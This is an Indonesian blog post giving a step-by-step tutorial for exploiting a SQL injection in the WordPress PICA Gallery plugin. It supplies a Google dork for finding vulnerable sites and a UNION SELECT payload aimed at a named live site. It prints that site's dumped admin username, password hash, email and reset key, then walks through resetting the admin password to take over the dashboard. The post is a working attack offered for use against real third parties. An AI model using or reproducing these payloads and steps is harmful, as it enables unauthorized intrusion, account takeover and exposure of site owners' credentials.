Rabu, 13 Maret 2013

0 Wordpress PICA Gallery-Sql Injection

Date: Rabu, 13 Maret 2013 07.29
Category:
Author: Unknown
Share:
Responds: 0 Comment
Kali ini ngebahas tentang Exploit PICA Gallery Sql Injection untuk Wordpress
Belakangan ini banyak sekali orang yang menggunakan exploit ini untuk attacking ke Wordpress. Langsung saja..

Dork: intext :"Powered by Apptha." inurl:gallery

Pastekan dork tadi ke google.








Target telah dipilih. Contoh
http://tecnicoafinador.com/pica-gallery/
ubah menjadi
http://tecnicoafinador.com/pica-gallery/?aid=-1+union+select+concat(user_login,0x3a,user_pass,0x3a,user_email),2,3,4+from+wp_users--

maka akan muncul seperti dibawah ini
admin:$P$BFCNIAKxW3xeD2QC6r90mguO.46en/0:tecnicoafinador@hotmail.com







Langkah selanjut nya yaitu mendapatkan user activation key nya. Buka page login web terserbut
http://tecnicoafinador.com/wp-login.php pilih forgot password, masukan user login dibagian forgot password kemudian pilih Get New Password

Fungsinya untuk memunculkan user activation key,
maka akan muncul seperti ini
admin:XilxSnQIqhUY8iAbGA50:tecnicoafinador@hotmail.com









setelah mendapatkan user activation key, lalu kita buka lagi page login web tadi.
http://tecnicoafinador.com/wp-login.php
ubah menjadi
http://tecnicoafinador.com/wp-login.php?action=rp&key=(user activation)&login=(user login)
maka akan seperti ini
http://tecnicoafinador.com/wp-login.php?action=rp&key=XilxSnQIqhUY8iAbGA50&login=admin

maka akan muncul seperti ini, halaman ini meminta reset password yang baru, isikan password sesuka hati, kemudian klik Reset Password







Setelah mereset password baru, login ke web tersebut dengan user tadi dan password yang telah di reset.
Maka akan masuk ke page admin.







Setelah masuk ke page admin silahkan anda ingin melakukan apa.

sumber : http://1337day.com/exploit/19437

Artikel Terkait :



Posting Komentar